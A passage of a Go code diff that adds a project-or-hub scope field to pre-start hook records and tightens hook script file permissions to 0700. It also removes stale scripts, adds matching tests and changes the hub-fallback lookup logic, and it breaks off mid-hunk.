 	Label = "project_pre_start_hook"
 	// FieldID holds the string denoting the id field in the database.
 	FieldID = "id"
+	// FieldScope holds the string denoting the scope field in the database.
+	FieldScope = "scope"
 	// FieldProjectID holds the string denoting the project_id field in the database.
 	FieldProjectID = "project_id"
 	// FieldName holds the string denoting the name field in the database.
@@ -42,6 +44,7 @@ const (
 // Columns holds all SQL columns for projectprestarthook fields.
 var Columns = []string{
 	FieldID,
+	FieldScope,
 	FieldProjectID,
 	FieldName,
 	FieldSlug,
@@ -65,8 +68,8 @@ func ValidColumn(column string) bool {
 }
 
 var (
-	// ProjectIDValidator is a validator for the "project_id" field. It is called by the builders before save.
-	ProjectIDValidator func(string) error
+	// DefaultProjectID holds the default value on creation for the "project_id" field.
+	DefaultProjectID string
 	// NameValidator is a validator for the "name" field. It is called by the builders before save.
 	NameValidator func(string) error
 	// SlugValidator is a validator for the "slug" field. It is called by the builders before save.
@@ -82,6 +85,32 @@ var (
 	// DefaultID holds the default value on creation for the "id" field.
 	DefaultID func() uuid.UUID
 )
+
+// Scope defines the type for the "scope" enum field.
+type Scope string
+
+// ScopeProject is the default value of the Scope enum.
+const DefaultScope = ScopeProject
+
+// Scope values.
+const (
+	ScopeProject Scope = "project"
+	ScopeHub     Scope = "hub"
+)
+
+func (s Scope) String() string {
+	return string(s)
+}
+
+// ScopeValidator is a validator for the "scope" field enum values. It is called by the builders before save.
+func ScopeValidator(s Scope) error {
+	switch s {
+	case ScopeProject, ScopeHub:
+		return nil
+	default:
+		return fmt.Errorf("projectprestarthook: invalid enum value for scope field: %q", s)
+	}
+}
 
 // Status defines the type for the "status" enum field.
 type Status string
@@ -115,6 +144,11 @@ type OrderOption func(*sql.Selector)
 // ByID orders the results by the id field.
 func ByID(opts ...sql.OrderTermOption) OrderOption {
 	return sql.OrderByField(FieldID, opts...).ToFunc()
+}
+
+// ByScope orders the results by the scope field.
+func ByScope(opts ...sql.OrderTermOption) OrderOption {
+	return sql.OrderByField(FieldScope, opts...).ToFunc()
 }
 
 // ByProjectID orders the results by the project_id field.

--- a/pkg/ent/projectprestarthook/where.go
+++ b/pkg/ent/projectprestarthook/where.go
@@ -100,6 +100,26 @@ func Updated(v time.Time) predicate.ProjectPreStartHook {
 	return predicate.ProjectPreStartHook(sql.FieldEQ(FieldUpdated, v))
 }
 
+// ScopeEQ applies the EQ predicate on the "scope" field.
+func ScopeEQ(v Scope) predicate.ProjectPreStartHook {
+	return predicate.ProjectPreStartHook(sql.FieldEQ(FieldScope, v))
+}
+
+// ScopeNEQ applies the NEQ predicate on the "scope" field.
+func ScopeNEQ(v Scope) predicate.ProjectPreStartHook {
+	return predicate.ProjectPreStartHook(sql.FieldNEQ(FieldScope, v))
+}
+
+// ScopeIn applies the In predicate on the "scope" field.
+func ScopeIn(vs ...Scope) predicate.ProjectPreStartHook {
+	return predicate.ProjectPreStartHook(sql.FieldIn(FieldScope, vs...))
+}
+
+// ScopeNotIn applies the NotIn predicate on the "scope" field.
+func ScopeNotIn(vs ...Scope) predicate.ProjectPreStartHook {
+	return predicate.ProjectPreStartHook(sql.FieldNotIn(FieldScope, vs...))
+}
+
 // ProjectIDEQ applies the EQ predicate on the "project_id" field.
 func ProjectIDEQ(v string) predicate.ProjectPreStartHook {
 	return predicate.ProjectPreStartHook(sql.FieldEQ(FieldProjectID, v))
@@ -153,6 +173,16 @@ func ProjectIDHasPrefix(v string) predicate.ProjectPreStartHook {
 // ProjectIDHasSuffix applies the HasSuffix predicate on the "project_id" field.
 func ProjectIDHasSuffix(v string) predicate.ProjectPreStartHook {
 	return predicate.ProjectPreStartHook(sql.FieldHasSuffix(FieldProjectID, v))
+}
+
+// ProjectIDIsNil applies the IsNil predicate on the "project_id" field.
+func ProjectIDIsNil() predicate.ProjectPreStartHook {
+	return predicate.ProjectPreStartHook(sql.FieldIsNull(FieldProjectID))
+}
+
+// ProjectIDNotNil applies the NotNil predicate on the "project_id" field.
+func ProjectIDNotNil() predicate.ProjectPreStartHook {
+	return predicate.ProjectPreStartHook(sql.FieldNotNull(FieldProjectID))
 }
 
 // ProjectIDEqualFold applies the EqualFold predicate on the "project_id" field.

--- a/pkg/ent/projectprestarthook_create.go
+++ b/pkg/ent/projectprestarthook_create.go
@@ -24,9 +24,31 @@ type ProjectPreStartHookCreate struct {
 	conflict []sql.ConflictOption
 }
 
+// SetScope sets the "scope" field.
+func (_c *ProjectPreStartHookCreate) SetScope(v projectprestarthook.Scope) *ProjectPreStartHookCreate {
+	_c.mutation.SetScope(v)
+	return _c
+}
+
+// SetNillableScope sets the "scope" field if the given value is not nil.
+func (_c *ProjectPreStartHookCreate) SetNillableScope(v *projectprestarthook.Scope) *ProjectPreStartHookCreate {
+	if v != nil {
+		_c.SetScope(*v)
+	}
+	return _c
+}
+
 // SetProjectID sets the "project_id" field.
 func (_c *ProjectPreStartHookCreate) SetProjectID(v string) *ProjectPreStartHookCreate {
 	_c.mutation.SetProjectID(v)
+	return _c
+}
+
+// SetNillableProjectID sets the "project_id" field if the given value is not nil.
+func (_c *ProjectPreStartHookCreate) SetNillableProjectID(v *string) *ProjectPreStartHookCreate {
+	if v != nil {
+		_c.SetProjectID(*v)
+	}
 	return _c
 }
 
@@ -181,6 +203,14 @@ func (_c *ProjectPreStartHookCreate) ExecX(ctx context.Context) {
 
 // defaults sets the default values of the builder before save.
 func (_c *ProjectPreStartHookCreate) defaults() {
+	if _, ok := _c.mutation.Scope(); !ok {
+		v := projectprestarthook.DefaultScope
+		_c.mutation.SetScope(v)
+	}
+	if _, ok := _c.mutation.ProjectID(); !ok {
+		v := projectprestarthook.DefaultProjectID
+		_c.mutation.SetProjectID(v)
+	}
 	if _, ok := _c.mutation.Status(); !ok {
 		v := projectprestarthook.DefaultStatus
 		_c.mutation.SetStatus(v)
@@ -201,12 +231,12 @@ func (_c *ProjectPreStartHookCreate) defaults() {
 
 // check runs all checks and user-defined validators on the builder.
 func (_c *ProjectPreStartHookCreate) check() error {
-	if _, ok := _c.mutation.ProjectID(); !ok {
-		return &ValidationError{Name: "project_id", err: errors.New(`ent: missing required field "ProjectPreStartHook.project_id"`)}
+	if _, ok := _c.mutation.Scope(); !ok {
+		return &ValidationError{Name: "scope", err: errors.New(`ent: missing required field "ProjectPreStartHook.scope"`)}
 	}
-	if v, ok := _c.mutation.ProjectID(); ok {
-		if err := projectprestarthook.ProjectIDValidator(v); err != nil {
-			return &ValidationError{Name: "project_id", err: fmt.Errorf(`ent: validator failed for field "ProjectPreStartHook.project_id": %w`, err)}
+	if v, ok := _c.mutation.Scope(); ok {
+		if err := projectprestarthook.ScopeValidator(v); err != nil {
+			return &ValidationError{Name: "scope", err: fmt.Errorf(`ent: validator failed for field "ProjectPreStartHook.scope": %w`, err)}
 		}
 	}
 	if _, ok := _c.mutation.Name(); !ok {
@@ -283,6 +313,10 @@ func (_c *ProjectPreStartHookCreate) createSpec() (*ProjectPreStartHook, *sqlgra
 		_node.ID = id
 		_spec.ID.Value = &id
 	}
+	if value, ok := _c.mutation.Scope(); ok {
+		_spec.SetField(projectprestarthook.FieldScope, field.TypeEnum, value)
+		_node.Scope = value
+	}
 	if value, ok := _c.mutation.ProjectID(); ok {
 		_spec.SetField(projectprestarthook.FieldProjectID, field.TypeString, value)
 		_node.ProjectID = value
@@ -330,7 +364,7 @@ func (_c *ProjectPreStartHookCreate) createSpec() (*ProjectPreStartHook, *sqlgra
 // of the `INSERT` statement. For example:
 //
 //	client.ProjectPreStartHook.Create().
-//		SetProjectID(v).
+//		SetScope(v).
 //		OnConflict(
 //			// Update the row with the new values
 //			// the was proposed for insertion.
@@ -339,7 +373,7 @@ func (_c *ProjectPreStartHookCreate) createSpec() (*ProjectPreStartHook, *sqlgra
 //		// Override some of the fields with custom
 //		// update values.
 //		Update(func(u *ent.ProjectPreStartHookUpsert) {
-//			SetProjectID(v+v).
+//			SetScope(v+v).
 //		}).
 //		Exec(ctx)
 func (_c *ProjectPreStartHookCreate) OnConflict(opts ...sql.ConflictOption) *ProjectPreStartHookUpsertOne {
@@ -375,6 +409,18 @@ type (
 	}
 )
 
+// SetScope sets the "scope" field.
+func (u *ProjectPreStartHookUpsert) SetScope(v projectprestarthook.Scope) *ProjectPreStartHookUpsert {
+	u.Set(projectprestarthook.FieldScope, v)
+	return u
+}
+
+// UpdateScope sets the "scope" field to the value that was provided on create.
+func (u *ProjectPreStartHookUpsert) UpdateScope() *ProjectPreStartHookUpsert {
+	u.SetExcluded(projectprestarthook.FieldScope)
+	return u
+}
+
 // SetProjectID sets the "project_id" field.
 func (u *ProjectPreStartHookUpsert) SetProjectID(v string) *ProjectPreStartHookUpsert {
 	u.Set(projectprestarthook.FieldProjectID, v)
@@ -384,6 +430,12 @@ func (u *ProjectPreStartHookUpsert) SetProjectID(v string) *ProjectPreStartHookU
 // UpdateProjectID sets the "project_id" field to the value that was provided on create.
 func (u *ProjectPreStartHookUpsert) UpdateProjectID() *ProjectPreStartHookUpsert {
 	u.SetExcluded(projectprestarthook.FieldProjectID)
+	return u
+}
+
+// ClearProjectID clears the value of the "project_id" field.
+func (u *ProjectPreStartHookUpsert) ClearProjectID() *ProjectPreStartHookUpsert {
+	u.SetNull(projectprestarthook.FieldProjectID)
 	return u
 }
 
@@ -552,6 +604,20 @@ func (u *ProjectPreStartHookUpsertOne) Update(set func(*ProjectPreStartHookUpser
 	return u
 }
 
+// SetScope sets the "scope" field.
+func (u *ProjectPreStartHookUpsertOne) SetScope(v projectprestarthook.Scope) *ProjectPreStartHookUpsertOne {
+	return u.Update(func(s *ProjectPreStartHookUpsert) {
+		s.SetScope(v)
+	})
+}
+
+// UpdateScope sets the "scope" field to the value that was provided on create.
+func (u *ProjectPreStartHookUpsertOne) UpdateScope() *ProjectPreStartHookUpsertOne {
+	return u.Update(func(s *ProjectPreStartHookUpsert) {
+		s.UpdateScope()
+	})
+}
+
 // SetProjectID sets the "project_id" field.
 func (u *ProjectPreStartHookUpsertOne) SetProjectID(v string) *ProjectPreStartHookUpsertOne {
 	return u.Update(func(s *ProjectPreStartHookUpsert) {
@@ -563,6 +629,13 @@ func (u *ProjectPreStartHookUpsertOne) SetProjectID(v string) *ProjectPreStartHo
 func (u *ProjectPreStartHookUpsertOne) UpdateProjectID() *ProjectPreStartHookUpsertOne {
 	return u.Update(func(s *ProjectPreStartHookUpsert) {
 		s.UpdateProjectID()
+	})
+}
+
+// ClearProjectID clears the value of the "project_id" field.
+func (u *ProjectPreStartHookUpsertOne) ClearProjectID() *ProjectPreStartHookUpsertOne {
+	return u.Update(func(s *ProjectPreStartHookUpsert) {
+		s.ClearProjectID()
 	})
 }
 
@@ -835,7 +908,7 @@ func (_c *ProjectPreStartHookCreateBulk) ExecX(ctx context.Context) {
 //		// Override some of the fields with custom
 //		// update values.
 //		Update(func(u *ent.ProjectPreStartHookUpsert) {
-//			SetProjectID(v+v).
+//			SetScope(v+v).
 //		}).
 //		Exec(ctx)
 func (_c *ProjectPreStartHookCreateBulk) OnConflict(opts ...sql.ConflictOption) *ProjectPreStartHookUpsertBulk {
@@ -917,6 +990,20 @@ func (u *ProjectPreStartHookUpsertBulk) Update(set func(*ProjectPreStartHookUpse
 	return u
 }
 
+// SetScope sets the "scope" field.
+func (u *ProjectPreStartHookUpsertBulk) SetScope(v projectprestarthook.Scope) *ProjectPreStartHookUpsertBulk {
+	return u.Update(func(s *ProjectPreStartHookUpsert) {
+		s.SetScope(v)
+	})
+}
+
+// UpdateScope sets the "scope" field to the value that was provided on create.
+func (u *ProjectPreStartHookUpsertBulk) UpdateScope() *ProjectPreStartHookUpsertBulk {
+	return u.Update(func(s *ProjectPreStartHookUpsert) {
+		s.UpdateScope()
+	})
+}
+
 // SetProjectID sets the "project_id" field.
 func (u *ProjectPreStartHookUpsertBulk) SetProjectID(v string) *ProjectPreStartHookUpsertBulk {
 	return u.Update(func(s *ProjectPreStartHookUpsert) {
@@ -928,6 +1015,13 @@ func (u *ProjectPreStartHookUpsertBulk) SetProjectID(v string) *ProjectPreStartH
 func (u *ProjectPreStartHookUpsertBulk) UpdateProjectID() *ProjectPreStartHookUpsertBulk {
 	return u.Update(func(s *ProjectPreStartHookUpsert) {
 		s.UpdateProjectID()
+	})
+}
+
+// ClearProjectID clears the value of the "project_id" field.
+func (u *ProjectPreStartHookUpsertBulk) ClearProjectID() *ProjectPreStartHookUpsertBulk {
+	return u.Update(func(s *ProjectPreStartHookUpsert) {
+		s.ClearProjectID()
 	})
 }
 

--- a/pkg/ent/projectprestarthook_query.go
+++ b/pkg/ent/projectprestarthook_query.go
@@ -265,12 +265,12 @@ func (_q *ProjectPreStartHookQuery) Clone() *ProjectPreStartHookQuery {
 // Example:
 //
 //	var v []struct {
-//		ProjectID string `json:"project_id,omitempty"`
+//		Scope projectprestarthook.Scope `json:"scope,omitempty"`
 //		Count int `json:"count,omitempty"`
 //	}
 //
 //	client.ProjectPreStartHook.Query().
-//		GroupBy(projectprestarthook.FieldProjectID).
+//		GroupBy(projectprestarthook.FieldScope).
 //		Aggregate(ent.Count()).
 //		Scan(ctx, &v)
 func (_q *ProjectPreStartHookQuery) GroupBy(field string, fields ...string) *ProjectPreStartHookGroupBy {
@@ -288,11 +288,11 @@ func (_q *ProjectPreStartHookQuery) GroupBy(field string, fields ...string) *Pro
 // Example:
 //
 //	var v []struct {
-//		ProjectID string `json:"project_id,omitempty"`
+//		Scope projectprestarthook.Scope `json:"scope,omitempty"`
 //	}
 //
 //	client.ProjectPreStartHook.Query().
-//		Select(projectprestarthook.FieldProjectID).
+//		Select(projectprestarthook.FieldScope).
 //		Scan(ctx, &v)
 func (_q *ProjectPreStartHookQuery) Select(fields ...string) *ProjectPreStartHookSelect {
 	_q.ctx.Fields = append(_q.ctx.Fields, fields...)

--- a/pkg/ent/projectprestarthook_update.go
+++ b/pkg/ent/projectprestarthook_update.go
@@ -28,6 +28,20 @@ func (_u *ProjectPreStartHookUpdate) Where(ps ...predicate.ProjectPreStartHook) 
 	return _u
 }
 
+// SetScope sets the "scope" field.
+func (_u *ProjectPreStartHookUpdate) SetScope(v projectprestarthook.Scope) *ProjectPreStartHookUpdate {
+	_u.mutation.SetScope(v)
+	return _u
+}
+
+// SetNillableScope sets the "scope" field if the given value is not nil.
+func (_u *ProjectPreStartHookUpdate) SetNillableScope(v *projectprestarthook.Scope) *ProjectPreStartHookUpdate {
+	if v != nil {
+		_u.SetScope(*v)
+	}
+	return _u
+}
+
 // SetProjectID sets the "project_id" field.
 func (_u *ProjectPreStartHookUpdate) SetProjectID(v string) *ProjectPreStartHookUpdate {
 	_u.mutation.SetProjectID(v)
@@ -39,6 +53,12 @@ func (_u *ProjectPreStartHookUpdate) SetNillableProjectID(v *string) *ProjectPre
 	if v != nil {
 		_u.SetProjectID(*v)
 	}
+	return _u
+}
+
+// ClearProjectID clears the value of the "project_id" field.
+func (_u *ProjectPreStartHookUpdate) ClearProjectID() *ProjectPreStartHookUpdate {
+	_u.mutation.ClearProjectID()
 	return _u
 }
 
@@ -207,9 +227,9 @@ func (_u *ProjectPreStartHookUpdate) defaults() {
 
 // check runs all checks and user-defined validators on the builder.
 func (_u *ProjectPreStartHookUpdate) check() error {
-	if v, ok := _u.mutation.ProjectID(); ok {
-		if err := projectprestarthook.ProjectIDValidator(v); err != nil {
-			return &ValidationError{Name: "project_id", err: fmt.Errorf(`ent: validator failed for field "ProjectPreStartHook.project_id": %w`, err)}
+	if v, ok := _u.mutation.Scope(); ok {
+		if err := projectprestarthook.ScopeValidator(v); err != nil {
+			return &ValidationError{Name: "scope", err: fmt.Errorf(`ent: validator failed for field "ProjectPreStartHook.scope": %w`, err)}
 		}
 	}
 	if v, ok := _u.mutation.Name(); ok {
@@ -247,8 +267,14 @@ func (_u *ProjectPreStartHookUpdate) sqlSave(ctx context.Context) (_node int, er
 			}
 		}
 	}
+	if value, ok := _u.mutation.Scope(); ok {
+		_spec.SetField(projectprestarthook.FieldScope, field.TypeEnum, value)
+	}
 	if value, ok := _u.mutation.ProjectID(); ok {
 		_spec.SetField(projectprestarthook.FieldProjectID, field.TypeString, value)
+	}
+	if _u.mutation.ProjectIDCleared() {
+		_spec.ClearField(projectprestarthook.FieldProjectID, field.TypeString)
 	}
 	if value, ok := _u.mutation.Name(); ok {
 		_spec.SetField(projectprestarthook.FieldName, field.TypeString, value)
@@ -303,6 +329,20 @@ type ProjectPreStartHookUpdateOne struct {
 	mutation *ProjectPreStartHookMutation
 }
 
+// SetScope sets the "scope" field.
+func (_u *ProjectPreStartHookUpdateOne) SetScope(v projectprestarthook.Scope) *ProjectPreStartHookUpdateOne {
+	_u.mutation.SetScope(v)
+	return _u
+}
+
+// SetNillableScope sets the "scope" field if the given value is not nil.
+func (_u *ProjectPreStartHookUpdateOne) SetNillableScope(v *projectprestarthook.Scope) *ProjectPreStartHookUpdateOne {
+	if v != nil {
+		_u.SetScope(*v)
+	}
+	return _u
+}
+
 // SetProjectID sets the "project_id" field.
 func (_u *ProjectPreStartHookUpdateOne) SetProjectID(v string) *ProjectPreStartHookUpdateOne {
 	_u.mutation.SetProjectID(v)
@@ -314,6 +354,12 @@ func (_u *ProjectPreStartHookUpdateOne) SetNillableProjectID(v *string) *Project
 	if v != nil {
 		_u.SetProjectID(*v)
 	}
+	return _u
+}
+
+// ClearProjectID clears the value of the "project_id" field.
+func (_u *ProjectPreStartHookUpdateOne) ClearProjectID() *ProjectPreStartHookUpdateOne {
+	_u.mutation.ClearProjectID()
 	return _u
 }
 
@@ -495,9 +541,9 @@ func (_u *ProjectPreStartHookUpdateOne) defaults() {
 
 // check runs all checks and user-defined validators on the builder.
 func (_u *ProjectPreStartHookUpdateOne) check() error {
-	if v, ok := _u.mutation.ProjectID(); ok {
-		if err := projectprestarthook.ProjectIDValidator(v); err != nil {
-			return &ValidationError{Name: "project_id", err: fmt.Errorf(`ent: validator failed for field "ProjectPreStartHook.project_id": %w`, err)}
+	if v, ok := _u.mutation.Scope(); ok {
+		if err := projectprestarthook.ScopeValidator(v); err != nil {
+			return &ValidationError{Name: "scope", err: fmt.Errorf(`ent: validator failed for field "ProjectPreStartHook.scope": %w`, err)}
 		}
 	}
 	if v, ok := _u.mutation.Name(); ok {
@@ -552,8 +598,14 @@ func (_u *ProjectPreStartHookUpdateOne) sqlSave(ctx context.Context) (_node *Pro
 			}
 		}
 	}
+	if value, ok := _u.mutation.Scope(); ok {
+		_spec.SetField(projectprestarthook.FieldScope, field.TypeEnum, value)
+	}
 	if value, ok := _u.mutation.ProjectID(); ok {
 		_spec.SetField(projectprestarthook.FieldProjectID, field.TypeString, value)
+	}
+	if _u.mutation.ProjectIDCleared() {
+		_spec.ClearField(projectprestarthook.FieldProjectID, field.TypeString)
 	}
 	if value, ok := _u.mutation.Name(); ok {
 		_spec.SetField(projectprestarthook.FieldName, field.TypeString, value)

--- a/pkg/ent/runtime.go
+++ b/pkg/ent/runtime.go
@@ -789,27 +789,27 @@ func init() {
 	projectprestarthookFields := schema.ProjectPreStartHook{}.Fields()
 	_ = projectprestarthookFields
 	// projectprestarthookDescProjectID is the schema descriptor for project_id field.
-	projectprestarthookDescProjectID := projectprestarthookFields[1].Descriptor()
-	// projectprestarthook.ProjectIDValidator is a validator for the "project_id" field. It is called by the builders before save.
-	projectprestarthook.ProjectIDValidator = projectprestarthookDescProjectID.Validators[0].(func(string) error)
+	projectprestarthookDescProjectID := projectprestarthookFields[2].Descriptor()
+	// projectprestarthook.DefaultProjectID holds the default value on creation for the project_id field.
+	projectprestarthook.DefaultProjectID = projectprestarthookDescProjectID.Default.(string)
 	// projectprestarthookDescName is the schema descriptor for name field.
-	projectprestarthookDescName := projectprestarthookFields[2].Descriptor()
+	projectprestarthookDescName := projectprestarthookFields[3].Descriptor()
 	// projectprestarthook.NameValidator is a validator for the "name" field. It is called by the builders before save.
 	projectprestarthook.NameValidator = projectprestarthookDescName.Validators[0].(func(string) error)
 	// projectprestarthookDescSlug is the schema descriptor for slug field.
-	projectprestarthookDescSlug := projectprestarthookFields[3].Descriptor()
+	projectprestarthookDescSlug := projectprestarthookFields[4].Descriptor()
 	// projectprestarthook.SlugValidator is a validator for the "slug" field. It is called by the builders before save.
 	projectprestarthook.SlugValidator = projectprestarthookDescSlug.Validators[0].(func(string) error)
 	// projectprestarthookDescScript is the schema descriptor for script field.
-	projectprestarthookDescScript := projectprestarthookFields[5].Descriptor()
+	projectprestarthookDescScript := projectprestarthookFields[6].Descriptor()
 	// projectprestarthook.ScriptValidator is a validator for the "script" field. It is called by the builders before save.
 	projectprestarthook.ScriptValidator = projectprestarthookDescScript.Validators[0].(func(string) error)
 	// projectprestarthookDescCreated is the schema descriptor for created field.
-	projectprestarthookDescCreated := projectprestarthookFields[9].Descriptor()
+	projectprestarthookDescCreated := projectprestarthookFields[10].Descriptor()
 	// projectprestarthook.DefaultCreated holds the default value on creation for the created field.
 	projectprestarthook.DefaultCreated = projectprestarthookDescCreated.Default.(func() time.Time)
 	// projectprestarthookDescUpdated is the schema descriptor for updated field.
-	projectprestarthookDescUpdated := projectprestarthookFields[10].Descriptor()
+	projectprestarthookDescUpdated := projectprestarthookFields[11].Descriptor()
 	// projectprestarthook.DefaultUpdated holds the default value on creation for the updated field.
 	projectprestarthook.DefaultUpdated = projectprestarthookDescUpdated.Default.(func() time.Time)
 	// projectprestarthook.UpdateDefaultUpdated holds the default value on update for the updated field.

--- a/pkg/ent/schema/projectprestarthook.go
+++ b/pkg/ent/schema/projectprestarthook.go
@@ -27,12 +27,17 @@ import (
 
 // ProjectPreStartHook holds the schema definition for the ProjectPreStartHook
 // entity. Each row is a named, versioned shell script that can be associated
-// with a project and staged into the agent container's pre-start hook directory
+// with a project (scope="project") or with the hub as a whole (scope="hub")
+// and staged into the agent container's pre-start hook directory
 // (pre-start.d/30-project-custom) before the agent process starts.
 //
-// One hook has status="active" per project at any given time; the rest are
-// "archived". This invariant is enforced by the store layer (not the DB schema)
-// so that the implementation stays portable across SQLite and Postgres.
+// One hook has status="active" per project at any given time, plus at most one
+// active hub-scoped hook; the rest are "archived". This invariant is enforced
+// by the store layer (not the DB schema) so that the implementation stays
+// portable across SQLite and Postgres.
+//
+// Hub-scoped rows carry an empty project_id. The project-scoped hook (if any)
+// takes precedence over the hub-scoped hook at agent-create time.
 type ProjectPreStartHook struct {
 	ent.Schema
 }
@@ -43,8 +48,18 @@ func (ProjectPreStartHook) Fields() []ent.Field {
 		field.UUID("id", uuid.UUID{}).
 			Default(uuid.New).
 			Immutable(),
+		// scope distinguishes project-scoped hooks from hub-wide hooks.
+		// Hub-scoped hooks act as the fallback for projects with no active
+		// project-scoped hook.
+		field.Enum("scope").
+			Values("project", "hub").
+			Default("project"),
+		// project_id is empty for hub-scoped hooks. It is Optional (rather
+		// than NotEmpty) for that reason; the store layer requires a
+		// non-empty value for project-scoped hooks.
 		field.String("project_id").
-			NotEmpty(),
+			Optional().
+			Default(""),
 		field.String("name").
 			NotEmpty(),
 		field.String("slug").
@@ -74,10 +89,14 @@ func (ProjectPreStartHook) Fields() []ent.Field {
 // Indexes of the ProjectPreStartHook.
 func (ProjectPreStartHook) Indexes() []ent.Index {
 	return []ent.Index{
-		// slug must be unique within a project.
-		index.Fields("project_id", "slug").Unique(),
+		// slug must be unique within a scope+project. Including scope keeps
+		// hub-scoped hooks (project_id="") from colliding with project-scoped
+		// hooks that happen to share a slug.
+		index.Fields("scope", "project_id", "slug").Unique(),
 		// Efficient lookup of all active hooks for a project.
 		index.Fields("project_id", "status"),
+		// Efficient lookup of the active hub-scoped hook.
+		index.Fields("scope", "status"),
 	}
 }
 

--- a/pkg/harness/project_hook.go
+++ b/pkg/harness/project_hook.go
@@ -30,21 +30,38 @@ const ProjectPreStartHookFilename = "30-project-custom"
 // agent home's pre-start hook directory at the fixed filename
 // 30-project-custom.
 //
-// The file is written with mode 0755 (executable) so the lifecycle manager
-// picks it up without additional chmod. The call is idempotent: if the file
-// already exists (e.g. on agent restart), it is overwritten with the current
-// script content.
+// The file is written with mode 0700: the lifecycle manager runs it as the
+// owner, so nothing else needs read or execute access to a script that may
+// contain project secrets. The call is idempotent: if the file already exists
+// (e.g. on agent restart), it is overwritten with the current script content.
 //
-// A non-empty scriptContent is required. Callers should check
-// AppliedConfig.ProjectPreStartHookScript before calling this function.
+// An empty scriptContent means "no hook applies" and removes any previously
+// staged script, so a hook deleted at the Hub does not survive on a reused
+// agent home.
 func WriteProjectPreStartHook(agentHome, scriptContent string) error {
+	dir := filepath.Join(agentHome, ".scion", "hooks", "pre-start.d")
+	target := filepath.Join(dir, ProjectPreStartHookFilename)
+
 	if scriptContent == "" {
+		// Nothing staged (no hook directory at all, or no such file) is the
+		// common case and not an error; only a real removal failure is.
+		if _, err := os.Lstat(target); err != nil {
+			return nil
+		}
+		if err := os.Remove(target); err != nil && !os.IsNotExist(err) {
+			return fmt.Errorf("remove stale pre-start hook: %w", err)
+		}
 		return nil
 	}
-	dir := filepath.Join(agentHome, ".scion", "hooks", "pre-start.d")
+
 	if err := os.MkdirAll(dir, 0755); err != nil {
 		return fmt.Errorf("create pre-start.d: %w", err)
 	}
-	target := filepath.Join(dir, ProjectPreStartHookFilename)
-	return os.WriteFile(target, []byte(scriptContent), 0755)
+	if err := os.WriteFile(target, []byte(scriptContent), 0700); err != nil {
+		return err
+	}
+	// WriteFile leaves the mode of a pre-existing file alone, so tighten it
+	// explicitly: an agent home staged by an older build may still hold a
+	// world-readable 0755 script.
+	return os.Chmod(target, 0700)
 }

--- a/pkg/harness/project_hook.go
+++ b/pkg/harness/project_hook.go
@@ -45,9 +45,6 @@ func WriteProjectPreStartHook(agentHome, scriptContent string) error {
 	if scriptContent == "" {
 		// Nothing staged (no hook directory at all, or no such file) is the
 		// common case and not an error; only a real removal failure is.
-		if _, err := os.Lstat(target); err != nil {
-			return nil
-		}
 		if err := os.Remove(target); err != nil && !os.IsNotExist(err) {
 			return fmt.Errorf("remove stale pre-start hook: %w", err)
 		}

--- a/pkg/harness/project_hook_test.go
+++ b/pkg/harness/project_hook_test.go
@@ -35,10 +35,13 @@ func TestWriteProjectPreStartHook_CreatesFile(t *testing.T) {
 	require.NoError(t, err)
 	assert.Equal(t, script, string(data))
 
-	// File must be executable.
+	// Owner-executable only: the script may carry project secrets and only the
+	// owner ever runs it.
 	info, err := os.Stat(target)
 	require.NoError(t, err)
-	assert.True(t, info.Mode()&0111 != 0, "file should be executable")
+	assert.True(t, info.Mode()&0100 != 0, "file should be owner-executable")
+	assert.Equal(t, os.FileMode(0700), info.Mode().Perm(),
+		"hook script must not be group- or world-accessible")
 }
 
 func TestWriteProjectPreStartHook_Idempotent(t *testing.T) {
@@ -62,6 +65,37 @@ func TestWriteProjectPreStartHook_EmptyScript_NoOp(t *testing.T) {
 	target := filepath.Join(agentHome, ".scion", "hooks", "pre-start.d", ProjectPreStartHookFilename)
 	_, statErr := os.Stat(target)
 	assert.True(t, os.IsNotExist(statErr), "file should not be created for empty script")
+}
+
+// An empty script means "no hook applies" — a previously staged script must be
+// removed so it cannot survive on a reused agent home after the hook is deleted.
+func TestWriteProjectPreStartHook_EmptyScript_RemovesStaleFile(t *testing.T) {
+	agentHome := t.TempDir()
+
+	require.NoError(t, WriteProjectPreStartHook(agentHome, "#!/bin/sh\necho stale\n"))
+	target := filepath.Join(agentHome, ".scion", "hooks", "pre-start.d", ProjectPreStartHookFilename)
+	require.FileExists(t, target)
+
+	require.NoError(t, WriteProjectPreStartHook(agentHome, ""))
+
+	_, statErr := os.Stat(target)
+	assert.True(t, os.IsNotExist(statErr), "stale hook script should be removed")
+}
+
+// A file staged by an older build with mode 0755 must be tightened on rewrite;
+// os.WriteFile alone leaves the mode of an existing file untouched.
+func TestWriteProjectPreStartHook_TightensLegacyPermissions(t *testing.T) {
+	agentHome := t.TempDir()
+	dir := filepath.Join(agentHome, ".scion", "hooks", "pre-start.d")
+	require.NoError(t, os.MkdirAll(dir, 0755))
+	target := filepath.Join(dir, ProjectPreStartHookFilename)
+	require.NoError(t, os.WriteFile(target, []byte("#!/bin/sh\necho legacy\n"), 0755))
+
+	require.NoError(t, WriteProjectPreStartHook(agentHome, "#!/bin/sh\necho current\n"))
+
+	info, err := os.Stat(target)
+	require.NoError(t, err)
+	assert.Equal(t, os.FileMode(0700), info.Mode().Perm())
 }
 
 func TestWriteProjectPreStartHook_CreatesDirectory(t *testing.T) {

--- a/pkg/hub/handlers_agent_create_helpers.go
+++ b/pkg/hub/handlers_agent_create_helpers.go
@@ -275,21 +275,32 @@ func (s *Server) populateAgentConfig(ctx context.Context, agent *store.Agent, pr
 	// Either way the broker stages a single file (30-project-custom) and
 	// AppliedConfig.ProjectPreStartHookID records which hook it came from, so
 	// no scope-specific fields are needed downstream.
+	//
+	// The hub fallback is entered only on a definitive "no project hook"
+	// (ErrNotFound). Any other project-lookup failure (DB blip, duplicate rows)
+	// is ambiguous: the project may well have an override we simply failed to
+	// read, and silently staging the hub script in that case would run the
+	// wrong code. On an ambiguous error we log and stage nothing.
 	if project != nil && agent.AppliedConfig.ProjectPreStartHookID == "" {
-		// 1. Project-scoped hook (takes precedence).
 		hook, hookErr := s.store.GetActiveProjectPreStartHook(ctx, project.ID)
-		if hookErr != nil && !errors.Is(hookErr, store.ErrNotFound) {
-			s.agentLifecycleLog.Warn("failed to resolve project pre-start hook",
-				"project_id", project.ID, "error", hookErr)
-		}
-
-		// 2. Hub-scoped fallback, only when no project hook was found.
-		if hook == nil {
+		switch {
+		case hookErr == nil:
+			// 1. Project-scoped hook found — it takes precedence.
+		case errors.Is(hookErr, store.ErrNotFound):
+			// 2. No project hook — fall back to the hub-scoped hook, if any.
 			var hubErr error
